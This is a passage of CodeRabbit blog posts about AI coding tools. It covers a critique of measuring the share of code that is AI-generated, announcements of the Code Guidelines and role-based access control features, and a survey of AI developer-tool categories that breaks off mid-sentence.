your company. In that case, you might achieve 50% of your codebase being AI generated while also adding exponentially more bugs to your code and increasing issues and customer complaints. And to make it worse, you might ALSO not be saving any time since your devs could be spending an equal amount of time [reviewing](https://x.com/ryancarson/status/1925283219995259034) and [fixing that code](https://x.com/vatvb/status/1927206140066021439) as they would have if they wrote it from scratch. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/09467c567900570583948e016a44b4fc84df55ceb289db5a1379b60561b72ea7_65cc75a7b2.jpg) But your AI usage would sound impressive during an earnings call, right? ## What percentage of AI code is too much? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/bcd4c3f0fb5f24d7d442577697a475244b98c33df8b229878451b3055510374c_ce987c79c2.png) While companies like Google and Microsoft are racing to make as much of their codebase as possible AI generated – and Microsoft’s CTO is even predicting that [95% of all code will be AI generated](https://www.techspot.com/news/107411-microsoft-cto-predicts-ai-generate-95-percent-code.html) by 2030 – it’s unlikely other companies are aiming that high. On a YC podcast back in March, Jared Friedman, Y Combinator Managing Partner claimed that a quarter of the accelerator’s current cohort have [codebases that are 95% generated by AI](https://techcrunch.com/2025/03/06/a-quarter-of-startups-in-ycs-current-cohort-have-codebases-that-are-almost-entirely-ai-generated/). I’ll summarize (and sanitize) the [YouTube comments](https://www.youtube.com/watch?v=IACHfKmZMr8) on that one for you: Most devs, unsurprisingly, felt that having a codebase that was 95% AI-generated was a recipe for disaster. It appears we have a Goldilocks dilemma here. There is a magic number that is neither too low, nor too high but just right when it comes to AI-generated code. But what is it? At what point does your code become *too* AI-generated? Is it 40%? 50%? 75%? Over 75%? Does it depend on the application? The language? Does it vary from one company to another? And what are you actually saying about a company by sharing this percentage? ## Should percentage of code be a metric that’s tracked? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c0588d874126ed42a732d75d4461f9a92cdcd2e6c22df6dddc2e3a9c2be8c880_e94c47c118.png) To answer this question, let’s dig into what this metric might actually be measuring. When companies like Google and Microsoft say 30% of their code is AI-generated, what are they counting? Usually, this refers to the number of lines or commits that originated from AI coding tools like Copilot, Cursor, Claude, or Windsurf. But raw lines of code is a notoriously poor metric of productivity or value. And that doesn’t account for the lines AI wrote that were then heavily edited. AI coding tools often excel at writing boilerplate or repetitive code—exactly the kind of low-complexity, low-value code that developers could produce rapidly themselves anyway. Counting these easy wins inflates AI adoption numbers without necessarily indicating meaningful productivity gains. Another challenge is that developers report frequent and concerning hallucinations like making up API keys that don’t exist. More critically, a metric based purely on volume doesn’t capture the complexity or quality of the code generated. It doesn’t tell you how much developer time was needed to debug or review the AI-generated code. Without these nuances, a 30% metric means almost nothing about actual efficiency or quality outcomes. Developer forums and surveys consistently highlight frustration at AI-generated code's tendency to introduce more bugs and vulnerabilities with one survey estimating that AI coding tools add up to [41% more bugs](https://www.cio.com/article/3540579/devs-gaining-little-if-anything-from-ai-coding-assistants.html). For example, Harness recently [released a survey](https://www.harness.io/state-of-software-delivery) that revealed 67% of developers spend more time debugging AI-generated code than human-generated code and 68% spend more time resolving security issues. Even worse was that 59% in the Harness survey said that they experienced problems with deployments at least half the time they used AI coding tools. Perhaps, for this reason, it’s not surprising why companies that are selling coding agents, like Microsoft, might want teams to adopt ‘percentage of the codebase’ as a success metric over others that give a more holistic view of the use of AI in development. But misguided OKRs, rigid quotas, and public leaderboards of each developer’s AI use ignore context and quality, leading developers to spend more time chasing meaningless metrics than delivering high-quality software. If you’re trying to measure the value of your AI investment, there are much better metrics to track. ## ‘Percentage of code’ metrics seem focused on cost cutting ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6030e98854b2ff961e4b707e8c54c0d6afcbf0af7f5d848895d1f1968b73fe6f_87174a5f58.png) What’s more concerning is that many devs report that AI mandates like these are often connected to hiring freezes at their companies – with [entry-level jobs being hit harder](https://sfstandard.com/2025/05/20/silicon-valley-white-collar-recession-entry-level/). That suggests many execs share the ‘optimism’ that AI will replace developers – something that people like Meta CEO [Mark Zuckerberg](https://www.inc.com/kit-eaton/mark-zuckerberg-plans-to-replace-some-coders-with-ai-which-might-prove-tricky/91140118), Salesforce CEO [Marc Benioff](https://www.itpro.com/software/development/maybe-we-arent-going-to-hire-anybody-this-year-marc-benioff-says-salesforce-might-not-hire-any-software-engineers-in-2025-as-the-firm-reaps-the-benefits-of-ai-agents#:~:text=Development-,'Maybe%20we%20aren't%20going%20to%20hire%20anybody%20this%20year,the%20benefits%20of%20AI%20agents) and AWS CEO [Matt Garman](https://www.hrgrapevine.com/us/content/article/2024-08-22-amazon-cloud-ceo-warns-software-engineers-ai-could-replace-your-coding-work-within-2-years) are talking about publicly a lot these days. In early 2025, Bernioff [shared his plans on a podcast](https://www.itpro.com/software/development/maybe-we-arent-going-to-hire-anybody-this-year-marc-benioff-says-salesforce-might-not-hire-any-software-engineers-in-2025-as-the-firm-reaps-the-benefits-of-ai-agents) saying, “Maybe we aren’t going to hire anybody this year. We have seen such incredible productivity gains because of the agents.” If this seems overly optimistic of AI’s potential to you, you’re right to feel that way. After all, Microsoft’s Nadella even admitted that they were seeing [‘mixed results’](https://techcrunch.com/2025/04/29/microsoft-ceo-says-up-to-30-of-the-companys-code-was-written-by-ai/) with AI-generated code in certain languages with their own Copilot tool in the LlamaCon chat. The problem with metrics like this is that many companies now believe that the use of AI-generated code is a way to reduce costs by replacing developers – or, at least, reduce their numbers. But, if you're measuring what percentage of your codebase is AI-generated because you believe you’ll eventually be able to cut your workforce by 50% once you achieve 50% AI code, you’re going to be sadly mistaken. In that case, adopting this metric appears like it could put companies on a collision course – not just to create more technical debt and issues – but also to disappoint investors. Either those layoffs won’t materialize or, if they do, they’ll lead to increased issues and noticeable quality degradations that will impact a company’s bottom line. ## Metrics developers actually need ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f0f7bdcc7cfb6e87104ed2558906f9e849cebf9c3fe49a04be16c583649c6675_8f1352e154.png) Instead of just measuring raw code generated, companies should be measuring the quality of that code and the ***true*** productivity impact of AI adoption. For example, in addition to AI usage and adoption metrics companies should also track: * Bug rates before and after adopting AI coding tools. * Deployment stability (frequency of production incidents) against AI usage, * Actual time saved in the full development lifecycle once debugging and more complex code reviews are added in. * Developer satisfaction and productivity based on qualitative feedback. Another strategy is to follow what ChargeLab has done. Mentioned in the [LeadDev article](https://leaddev.com/culture/ai-coding-mandates-are-driving-developers-to-the-brink), it has a more dev-focused AI strategy. Their developers choose their AI tools freely, which resulted in a measured 40% productivity increase. This increase was not driven by mandates but by empowering developers with context-specific and meaningful metrics they themselves set and allowing them to have choice over their tools. Another [LeadDev article](https://leaddev.com/technical-direction/why-developers-and-their-bosses-disagree-over-generative-ai) also suggested that AI adoption shouldn’t be narrowly focused on code generation since productivity gains can equally be had at [other parts of the software development lifecycle](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack?) like code reviews, refactoring, testing and documentation. Metrics around how much of your codebase is AI-generated ignore the potential savings from those areas. Indeed, the DORA report on the [Impact of AI in Software Development](https://dora.dev/research/ai/gen-ai-report/) outlined 5 strategies for ensuring AI actually helps with productivity gains. The first strategy? Use AI at all stages of the development cycle, not just for code generation. The use of AI throughout the entire development cycle is becoming so common, that we flagged it as the [main development trend we expect to see in 2025](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack?) in a post last month. ## Creating useful AI adoption metrics: best practices ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b95ec72f140e284500f9c962bdce7dd2abb88d253a4be87e75b73bf6d8b36dd7_cc02a4daa2.png) Effective AI adoption metrics should come directly from engineering teams themselves, not from executives disconnected from the realities of the company’s codebase. Metrics should: * Be developed in collaboration with engineers who understand day-to-day workflows. * Align with real productivity and business outcomes, not superficial adoption targets. * Encourage flexible, context-aware experimentation rather than rigid enforcement. ChargeLab's strategy, for example, involved setting a broad organizational goal (e.g., saving [$1 million annually](https://leaddev.com/culture/ai-coding-mandates-are-driving-developers-to-the-brink) in dev time by using AI) but giving teams freedom in how to achieve it. It balances clear direction with developer empowerment, focusing on measurable, meaningful outcomes instead of simplistic quotas that are narrowly limited to the use of one universal tool. Such a metric would allow developers to decide to write code manually when it makes more sense to and to save time at the code review or QA/testing phase by deploying AI tools there instead. ## Should we track AI-generated code percentages at all? Ultimately, "percentage of AI-generated code" as a standalone metric has limited value. It’s too simplistic, incentivizes the wrong behaviors, and risks causing developer frustration. Instead, engineering leaders and developers should focus on metrics tied explicitly to productivity, code quality, and developer satisfaction. These nuanced, outcome-oriented metrics provide true insight into AI’s impact far beyond what a simplistic “percentage of your codebase” metric could ever convey. ***Want to try an AI tool that will help you ship better code faster? Start a*** [***14-day CodeRabbit trial***](https://app.coderabbit.ai/login???free-trial&_gl=1*qpc7tl*_gcl_au*MjAwMTM2Mjk0MC4xNzQ0OTI5MzMx*_ga*NTAxMzUzODg4LjE3NDQ5MjkzMzE.*_ga_7YWHDJSXQ1*czE3NTE5MTk2NjIkbzk2JGcwJHQxNzUxOTE5NjYyJGo2MCRsMCRoMzAyMTEwNjM.) ***today!***

Code Guidelines: Bring your coding rules to CodeRabbit

Edgar Cerecerez — Wed, 02 Jul 2025 00:00:00 GMT

If you're using or have tried out Cursor or another AI coding tool (who hasn't?), chances are you've also seen the downsides of it. Maybe you’re having to repeat how to structure the project when creating new files. Or maybe you're using shadcn/ui for UI components. Or maybe when you want to run a build that requires another command to build a backend dependency first. Cursor, Windsurf, Copilot, and other AI coding agents addressed this problem by adding support for reusable, scoped instructions that can be read on every ask – or when requested. Smart move! ## **Using Code Guidelines** CodeRabbit will automatically detect your coding rules for: * Cursor `.cursorrules` * GitHub Copilot `.github/copilot-instructions.md` * Cline `/.clinerules/*` * Windsurf `/.windsurfrules` * Claude `/`[`CLAUDE.md`](http://claude.md) * And more With Code Guidelines, these rules are used as context on every PR review. We also support adding your own rules by specifying a custom file pattern. Got your guidelines in docs/STANDARDS.md or team/code-style.txt? Just add the pattern and CodeRabbit will pick it up. ## **Why it matters** This has huge implications. For one, that means CodeRabbit will follow the same rules you set with your AI coding agent. No more context switching. No more explaining the same standards twice. It also gives you a way to specify exactly how CodeRabbit should do a PR review and what best practices you want the CodeRabbit review agent to follow. Now, you can just add these guidelines to your rules (be it from Cursor, GitHub, etc.) and: * **Enforce style and formatting consistency** - If your `.cursorrules` say "use camelCase for functions, PascalCase for components," CodeRabbit will flag violations during review. * **Maintain architecture patterns** - Define your preferred file structure, module boundaries, or dependency rules once and CodeRabbit ensures every PR follows them. * **Apply team-specific standards** - Whether it's "always use early returns" or "prefer composition over inheritance," your unique team preferences become part of every review. ## **What's next?** CodeRabbit’s not-so-secret magic to PR reviews is the level of context engineering it does. Code Guidelines make CodeRabbit’s reviews even better by adding your coding rules. As for what’s next, I'll give you a hint: context is king. Stay tuned. ***If you haven't tried CodeRabbit yet, there's never been a better time.*** [***Get started for free***](https://coderabbit.link/hUbDimn) ***and start cutting your code review time (and bugs) in half.***

Role-Based Access Control (RBAC) for granular permission sets

Sahil Mohan Bansal — Mon, 16 Jun 2025 00:00:00 GMT

Hey folks - we’re excited to share that Role-Based Access Control (RBAC) is now available for all CodeRabbit customers. This gives your Org Admins the ability to assign granular permission sets that control the actions that users can take. You can find these settings under the [Subscriptions menu](https://app.coderabbit.ai/settings/subscription) in the CodeRabbit app. We have defined three main roles, each with different permissions as they pertain to CodeRabbit settings and configurations: 1. **Admins:** Full access with the ability to run code reviews and configure everything in CodeRabbit — review settings, manage integrations, assign roles, edit learnings, view dashboards, generate reports, subscription and billing management. 2. **Members:** Limited access with the ability to run code reviews, with read-only permissions to access org or repo level settings, integrations, learnings, dashboards, reports, and subscription details. 3. **Billing Admins:** optional role that is only responsible for subscription and billing management. This role has no ability to configure settings or have code reviewed, and it is not a paid seat. The roles are assigned separately for each Org. If you have multiple Orgs, then roles in one Org do not apply to other Orgs. Only “Admin” users can change these roles and add other users as “Admins”, “Members” or “Billing Admins.” ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a141c6d293aca4488139432800827be3087f63634159c8a9442be3440ace6ff1_32f331a40d.png) *New roles can be found under Subscription menu* Note that bot users are automatically assigned a “Member” role and this cannot be changed. Only users that have a CodeRabbit seat assigned to them can have their role changed by an admin. ## CodeRabbit role permissions We recommend assigning the “Billing Admin” role to users who will only be responsible for managing the financial aspects of your CodeRabbit subscription, such as adding new users, increasing the number of seats, changing plans, etc. If you do not have a dedicated person that will act as a “Billing Admin” then any other “Admin” in your Org can also perform all billing and subscription tasks. You’ll need to assign the “Admin” role to users who must have write access to every feature and config setting in CodeRabbit. Other users who are primarily concerned with running AI code reviews only may be limited to the “Member” role. Here is a detailed matrix that explains the different permission sets for each of the three roles. | **Resource** | **Admin** | **Member** | **Billing Admin** | | --- | --- | --- | --- | | Org Settings | Write | Read-only | No access | | Repo Settings | Write | Read-only | No access | | Integrations | Write | Read-only | No access | | Learnings | Write | Read-only | No access | | Dashboards | Write | Read-only | No access | | Reports | Write | Read-only | No access | | User Management | Write | Read-only | Read-only | | Subscription Management | Write | Read-only | Write | | Billing Management | Write | No access | Write | Note that “Admins” also have the same level access that “Billing Admins” do but the reverse is not true. Every “Admin” can perform the same tasks that a “Billing Admin” can. Any user that must only be a “Billing Admin” needs to be invited manually by an “Admin.” The screenshot below shows how an “Admin” can invite another “Billing Admin” using their email, if that user does not exist in your Git platform. Also, for users with “Member” role, the metrics in the dashboards will only be visible for the Team that they are a part of in their Git platform. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/76aba7b4c4d3df67ff5c679625f8207a0d08cc525700150367b6339087057b4d_620aef76b6.png) *Invite Billing Admins using their email* Users that are added as Billing Admins, and those that do not exist in your Git platforms, must login using the [Login with Email](https://app.coderabbit.ai/sign-in-with-email/coderabbitai) option instead of the Git platform credentials. ## Role mapping from Git platform to CodeRabbit Some roles are assigned by default for all users that exist in your Git organization. You can review these under the “users” menu. The default roles are mapped to the permissions that user has in your Git platform organization and are automatically inherited by CodeRabbit. You will have to manually assign roles to users if you want to change CodeRabbit’s default assignment that is based on the mapping rules below. | **Github** | **Gitlab** | **Azure DevOps** | **Bitbucket** | **Default Mapping to CodeRabbit Role** | | --- | --- | --- | --- | --- | | Admin / Billing Manager | Owner | Admin | Owner | Admin | | Member | Maintainer | | Member | Member | | | Developer | | | Member | | | Reporter | | | Member | | | Planner | | | Member | | | Guest | | | Member | | | Minimal Access | | | Member | | Added Manually | Added Manually | Added Manually | Added Manually | Billing Admin | Note that Azure DevOps only reports “Admin” users. If a user exists in Azure DevOps organization and is not an “Admin” then we assign the “Member” role to them by default. ## TL;DR The TL;DR for the RBAC roll-out: 1. You can now assign three different roles to CodeRabbit users: * Admins - run code reviews with write access to configure everything * Member - run code reviews with read-only access for various configs * Billing Admins - special role, only if a dedicated user must be the one to manage billing and subscription 2. CodeRabbit roles for new and existing users are automatically mapped to equivalent roles in your Git platforms. Only CodeRabbit “Admins” can change these roles. 3. All roles are mapped to a specific Org. Users in multiple orgs can have different roles in each Org. 4. Users with “Admin” equivalent roles in their Git platform must be the ones to initiate a CodeRabbit trial. Have questions or feedback? Reach out to our team via our community [Discord server](https://discord.gg/coderabbit) (for free users). Paying CodeRabbit customers and those in an active free trial period, can reach out via this [support page](https://www.coderabbit.ai/contact-us/support) to reach our technical team for a faster response. Please provide your Org name when you reach out. ## What’s next? We continue to listen to our customers and incorporate their feedback. The following features are on our near to medium term roadmap: 1. Expanding RBAC to our self-hosted customers. v1 of RBAC release is limited to SaaS customers only 2. Ability for “Member” level users to start a CodeRabbit trial 3. Custom role definitions where admins can pick and choose a custom set of permissions and create new roles 4. Consistent role availability across all organizations configured with CodeRabbit 5. SSO integration (SAML / OIDC) Next steps for you: [Login to CodeRabbit](https://app.coderabbit.ai/login), navigate to Subscriptions menu and review or change the CodeRabbit roles for users in your organization. You can also refer the [documentation](https://docs.coderabbit.ai/guides/roles) for more details.

AI dev tool stack: How engineering teams are using AI

Aravind Putrevu — Tue, 10 Jun 2025 00:00:00 GMT

In our last post, we covered why we think [2025 is the year of the AI tech stack](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack), the layers in the stack, and even shared some sample stacks we’ve been seeing teams using. Here, we'll dive deeper into how teams are actually putting these tools to work. We’ll look at stack’s layers, the different types of tools in each, and how developers are using these AI tools to speed up their development process or tackle common pain points from adopting AI coding tools. From codebase context tools that help you prompt AI assistants better to AI code review tools with agentic actions, each layer brings unique solutions to real-world headaches — both those that have always existed and the ones that are specific to AI coding tools. We’ll walk through practical examples and share how we’re seeing teams integrating AI at every step. ## The AI dev tool tech stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e805deb9842da19bfe8b9222848bac27a844f885f3f2d53da65fd72b1b0cd092_d738062109.png) As we mentioned in our previous post, teams are increasingly building out AI dev tool stacks—layered sets of AI-powered tools designed to support each stage of the software development lifecycle. Here's a quick overview of the stack's layers, how they connect, and why you'll likely start using most of these tools soon. * **Foundational:** AI coding assistants * **Essential layer**: AI code review tools * **Optional layer:** AI QA test tools * **Optional layer:** AI refactoring tools * **Optional layer:** AI documentation tools ## Foundational: AI coding assistants ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8f111878aca44b0f1cc1d40b6628b2969005011e3eb82a0ddbf643fa8b992a7b_5e062c0617.png) AI coding assistants are the foundation for most teams adopting AI tools. Previously, we talked about how these tools [span a wide variety of functions](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) from accelerating coding by suggesting autocompletes to even generating entire functions and components from simple prompts. Increasingly, developers use multiple coding assistants, choosing different tools for different strengths and personal preferences – which helps boost overall productivity and satisfaction. A great example of this is how [ChargeLab was able to improve productivity by 40%](https://leaddev.com/culture/ai-coding-mandates-are-driving-developers-to-the-brink) by allowing their developers and teams to choose which AI tools to adopt. We break these tools into five categories – though many tools span multiple categories. ### **Tab completion tools: *Autocomplete but smarter*** **Tools**: GitHub Copilot, Cursor Tab, Windsurf, TabNine, Sourcegraph Cody, Qodo, Jetbrains * These tools don’t try to build your entire app. Instead, they help you write code faster and save cognitive effort by providing contextual code suggestions for repetitive coding tasks inside your IDE. * While the buzz around AI coding tools is currently focused on agentic capabilities, tab completion remains the most commonly used AI functionality in companies we’re talking with. We estimate that around 90% of AI coding tool use has so far been with autocomplete tools. That’s likely because they’re focused on complementing the developer over doing work independently so are less likely to introduce or require significant editing. * Some developers prefer tab completion tools over other types of AI assistants since they give them more control over the code they write while still offering time savings over writing it themselves. Their use also tends to be focused on automating simple things like classes and interface names. For that reason, they’re easy for any dev to use. * Increasingly, tab completion tools are more context aware and predictive – understanding the context of your codebase and not just the code you’re currently working on. ### **AI coding assistants: *Context-aware, multi-purpose tools*** **Tools**: GitHub Copilot, Cursor, , Windsurf, Claude Code, OpenAI Codex CLI, Traycer Zed, Cody by Sourcegraph, Aider, Qodo, Cline, Roocode, Blackbox, OpenHands, Gemini Code Assist, Augment Code, Amazon Q, JetBrains AI Assistant * AI coding assistants are often part of a new breed of AI-native editors that offer a number of AI coding tools like tab completion, code generation, AI chat, and agentic coding capabilities. * AI coding assistants are best at writing entire blocks of code with inline explanations. They can be incredibly effective at bootstrapping first drafts of new features, generating unit tests, and refactoring. However, they’re more likely to add bugs and issues to your code than a tab completion tool and generally require good prompting to get good results – as [this tweet by Cursor](https://x.com/ryolu_/status/1914384195138511142?s=46&t=v44WRRwh6MCK7nZNelMHxA) attests. For this reason, the quality of suggestions varies depending on the developer's prompting expertise. * Because AI assistants can answer questions as well as generate code, they also help reduce context switching (and time spent on Stack Overflow) when writing code yourself. * While most AI coding assistants are IDE-based like Cursor, JetBrains, Windsurf, Zed, and Copilot (which is in VS Code) – some also operate in the CLI including Claude Code, Aider, and OpenAI’s Codex. * AI coding assistants are more context-aware than tab completion tools and focused on learning your codebase and coding style over time to increase the relevance of their suggestions. ### **Agentic coding tools: *The next frontier (but pricey)*** **Tools**: Cursor, Windsurf, GitHub Copilot, Claude Code, OpenAI Codex, Cline, Roocode, Blackbox AI, Continue, Devin, Jules, Augment Code, OpenHands * These tools often overlap with AI coding assistants but we’ve put them in their own category since not all assistants have agentic capabilities and there are some coding agents which are more focused on agentic coding. * These tools are able to analyze your codebase to determine how best to approach coding tasks or solve problems. Then, autonomous or semi-autonomous agents work to solve those problems or complete tasks like writing tests, testing code, installing several packages, fixing issues in code, or generating new code and raising PRs based on your requests. They also can understand your codebase and summarize files. * Typically, they have the ability to execute specific tasks including modifying code and creating files. They also are integrated into your development environment and can interact with your tools. * Many have the ability to execute tasks autonomously and can do so without direct supervision like Devin, Claude Code. and OpenAI Codex while others make suggestions that you have to approve like Copilot and Windsurf. Depending on the task, developers might prefer one or the other type of tool. * Agentic coding tools are still in the early stages but are evolving fast. In the right hands and with the right tasks, they can offer major returns — or create really creative new bugs. ### **AI app generator tools: *Generate an app or website fast*** **Tools**: Lovable, v0, Bolt, Builder.io, Figma Make, Fine.dev, Stitch * These tools focus on quickly generating entire apps or websites rather than simply completing individual lines of code or generating features. They promise to build full-stack applications rapidly—from frontend UI design to backend infrastructure setup and are integrated with cloud databases. For that reason, they primarily appeal to non-developers. They also likely herald the end of no-code tools since they simplify the process even more. * The increasing popularity of app-generation tools among developers’ is, therefore, often focused on quickly prototyping new ideas rather than creating something that will end up in production. * App-generation tools are more agentic than code generation tools and handle a broader scope of the development process. This can mean significant initial time savings but might require more oversight and editing downstream to customize generated apps to exact specifications. But many devs question whether a generated app might actually be ready for production. * App-generation tools are rapidly evolving to become increasingly sophisticated – allowing developers to describe application ideas while AI translates these descriptions into functional codebases with minimal manual intervention. However, they remain of limited use to many developers who typically work on pre-existing codebases and applications. ### **Codebase context tools: *Up-to-date codebase context*** **Tools:** Repomix, Repo Prompt, Context7 * These tools are crucial enablers for AI-assisted software development. They structure and deliver relevant slices of large codebases to AI models — giving the AI the context it needs to reason effectively across many files. * Developers simply prompt an AI assistant and these AI tools curate the most relevant parts of the codebase to feed into the model, ensuring the assistant isn’t flying blind in large or complex projects. * Codebase context tools can also help compress and structure prompts for AI agents to allow them to maintain a functional understanding of a large codebase within stated token limits — improving the quality of your generated code while reducing the cost when using tools with consumption-base pricing. ## Essential layer: AI code review tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/afc59b8ec3449753c93a8e26c0647434ca41bc01da6dc6d5b8a8983e43561fd1_c406a6103e.png) Next up are AI code review tools, a critical layer because they directly tackle the increased workload created by faster AI-assisted coding. In our [previous post](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack), we highlighted how these tools help teams better manage the growing volume of code produced, reducing burnout from manual reviews. AI-driven code reviews not only speed up the process by allowing teams to merge PRs significantly faster – but also greatly improve quality by catching bugs early, reducing reviewer fatigue, and standardizing best practices. Some, like CodeRabbit even have agentic workflows and can help with things like generating unit tests, making multi-file edits, or raising new PRs. After AI coding tools, AI code review tools are the AI tool dev teams are most likely to adopt — both to deal with [existing code review backlogs](https://www.coderabbit.ai/blog/tackling-a-legacy-codebase-and-high-defect-rate-after-an-acquisition?) and to address the glut of AI-written PRs of questionable code quality. Ultimately, they automate tedious tasks, freeing developers to focus on the high-impact work they genuinely enjoy. These tools come in three main flavors: ### **Features of an AI coding tool: *AI coding tools review themselves*** **Tools:** Cursor, GitHub Copilot, JetBrains, Windsurf Forge ([deprecated](https://windsurf.com/blog/forge-deprecation)) * Some AI coding assistants offer code review tools as features included in their subscriptions or as add-ons. For example, Cursor’s subscription includes IDE-based code reviews and GitHub Copilot’s subscription includes CI/CD-based reviews. Up until April 2025, Windsurf also offered Forge, a CI/CD-based code review tool that was an add-on to their service. However, they recently deprecated it and relaunched code reviews as a feature of their main AI coding assistant. * It makes sense to some to include AI code reviews as part of existing AI coding assistant tools since code reviews are such a core use case for AI in development. However, many question how effective a coding assistant can be when reviewing the code it generates. * With code reviews, the best practice has always been to have peers or senior devs do reviews with a goal of ensuring that several different sets of eyes look for potential issues. Having AI code reviews as a feature of coding assistants deviates from the central security and quality protocol. How can you expect the AI tool that added 41% more bugs to your code to find any of those bugs if it didn’t realize they were bugs to begin with? * What’s more, AI coding assistants often prioritize low latency and real-time responses leading to potentially more superficial code reviews over standalone AI code review tools which focus on quality. * Forge’s depreciation also suggests that, as a feature or an add-on, code reviews are unlikely to be a core focus of product development by AI coding assistants – especially as the space becomes more competitive and companies devote more time to improving their core offerings. That could likely mean standalone solutions will be more comprehensive and have more features making them able to deliver additional value. ### **Git-based AI code review tools: *Reviews that save teams time*** **Tools:** CodeRabbit, Bito, Greptile, Qodo, Graphite Diamond * These tools run automatic reviews when you open a pull request. First-pass AI code reviews find bugs, security vulnerabilities, syntax errors, stylistic issues, and more in order to save senior engineers time adding comments on issues themselves. * These tools fit perfectly within your CI/CD workflow and existing code review processes while offering PR summaries and 1-click fixes to make it easier to both review and fix issues. * With codebase awareness and enhanced context, these tools can catch common issues early, find bugs you might miss, and enhance code quality across your codebase. * Offerings like CodeRabbit even have agential chat and workflows allowing you to do things like generate docstrings and unit tests, make multi-file edits, raise PRs, and more by simply chatting with the AI reviewer. * Having AI code reviews at the CI/CD stage is critical to streamline the code review process while implementing code quality standards across the codebase. ### **Both IDE and Git-based AI code review tools: *Reviews at every stage*** **Tools:** CodeRabbit, SonarQube, Qodo, Sourcery * Few AI code review tools offer code reviews in the IDE and CI/CD tools. These tools provide the most comprehensive code review support by reducing bugs at multiple stages of the development cycle. * Connecting IDEs with CI/CD reviews also allows for multilayer reviews allowing for a more seamless workflow and additional quality checks. ## Optional layer: AI QA test generation & execution tools We [previously discussed](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) how QA testing has traditionally incorporated forms of machine learning or AI, but newer tools are going even further by automating the most repetitive and time-consuming aspects of testing. These AI-powered tools generate extensive and realistic test scenarios from simple descriptions, significantly speeding up the testing process. Beyond speed, they also enhance test coverage by considering numerous permutations a human tester might overlook. Additionally, some of these tools offer "self-healing" features that automatically update tests when your app’s UI or underlying data changes. We break these down into two categories: ### **AI test generation tools: *Test generation-only*** **Tools**: Testim, Mabl, Functionalize, testRigor, Autify, ACCELQ, Qodex, Tricentis * AI test generation tools don’t run or manage tests—instead, they automate the creation of test cases, scripts, or scenarios based on natural-language descriptions or by analyzing existing code paths. * Their main appeal is reducing the tedious, repetitive work of manually defining each individual test case to help QA engineers rapidly build out robust test suites. * Developers and QA teams appreciate these tools because they speed up initial test creation and are especially useful when expanding test coverage for large, complex, or legacy applications. * While great for generating volume quickly, these tools typically require manual fine-tuning and review to ensure accuracy and coverage. * Increasingly, these tools leverage deeper context-awareness that allows them to parse existing code and user journeys more intelligently, allowing them to propose test cases that closely align with real-world use cases. ### **AI test execution and maintenance tools: *End-to-end AI test support*** **Tools**: MuukTest, Applietools, Sauce Labs, Perfecto, Meticulous * Full-lifecycle AI QA tools go beyond test generation and handle the entire testing process – from writing test cases to executing them automatically and even maintaining them as your application evolves. * Teams often favor these comprehensive tools because they dramatically reduce QA workload by automating, not just initial test creation, but the ongoing upkeep required when the codebase or UI changes. * Though these tools significantly ease maintenance burdens, they can sometimes struggle with intricate or complex scenarios. * Increasingly sophisticated, these tools integrate seamlessly into existing CI/CD workflows, providing continuous, automated testing coverage across multiple environments and deployment stages. ## Optional layer: AI Refactoring tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d82e39f6537abd0aa84d8f6af8991ba473e2b0b5cf899460c0546cd93868c577_da5925aba7.png) Another crucial area is AI refactoring tools. While general AI coding assistants may claim refactoring capabilities, their outcomes often fall short. This has led many teams to adopt specialized AI refactoring tools explicitly designed for optimizing and improving codebases. These dedicated tools automate tedious tasks, quickly identifying and performing refactoring opportunities based simply on natural-language instructions, drastically cutting down manual effort and enhancing code maintainability. We divide these tools into two types: ### **Semi-automated tools: *The tab completion of refactoring tools*** **Tools:** CodeGPT, GitHub Copilot, Amazon CodeWhisperer, Sourcegraph Cody * Semi-automated refactoring tools don’t completely take the wheel. Instead, they proactively suggest code improvements within your IDE allowing you to quickly accept, reject, or modify each suggestion. * These tools focus on smaller-scale, incremental refactors—like simplifying methods, restructuring loops, or optimizing function logic—that benefit from a human eye before committing. * Developers prefer semi-automated tools for complex or sensitive refactoring tasks because they offer fine-grained control. * The appeal lies in their balance. They speed up routine refactors while leaving room for developer judgment — minimizing the risk of unwanted changes or subtle bugs sneaking into production. * Increasingly, semi-automated refactoring tools leverage deeper context-awareness, analyzing the broader codebase to offer smarter, more relevant suggestions. ### **Fully automated tools: *When you want to give AI more autonomy*** **Tools**: Claude Code, Devin, OpenAI Codex * These AI tools handle large-scale, repetitive refactoring tasks automatically across your entire codebase, often from just a single set of instructions or rules. * While semi-automated tools highlight refactoring opportunities for devs to review manually, fully automated tools excel at bulk tasks—such as upgrading dependencies, migrating frameworks, or standardizing code styles—potentially saving hours of repetitive work. * These tools appeal to teams looking to tackle technical debt at scale without spending days manually applying the same refactor across hundreds or thousands of files. * Developers appreciate their reliability and consistency for clearly defined, repetitive refactors, but fully automated tools generally work best when given explicit rules. They’re less suited for nuanced code improvements that require human judgment. * Increasingly, fully automated refactoring tools can parse multiple programming languages and integrate directly into existing CI/CD pipelines. ## Optional layer: AI documentation tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/30bbfaffd165ae932ee1cb25f722a381fa7006901e3fcd18200cff80da072a57_86808da231.png) Finally, AI documentation tools, while not usually the first thought when adopting AI, have proven incredibly valuable. As we previously noted, these tools tackle the often-dreaded task of writing and updating code documentation such as inline comments and docstrings. By leveraging AI, developers can quickly generate clear, accurate, and up-to-date documentation directly from their codebase, saving significant time and effort that would otherwise be spent manually maintaining documentation. ### **Code-level docs tools:** **Tools**: DeepWiki, Cursor, CodeRabbit, Swimm, GitLoop, GitSummarize * AI documentation tools analyze code structures and behaviors to produce readable, 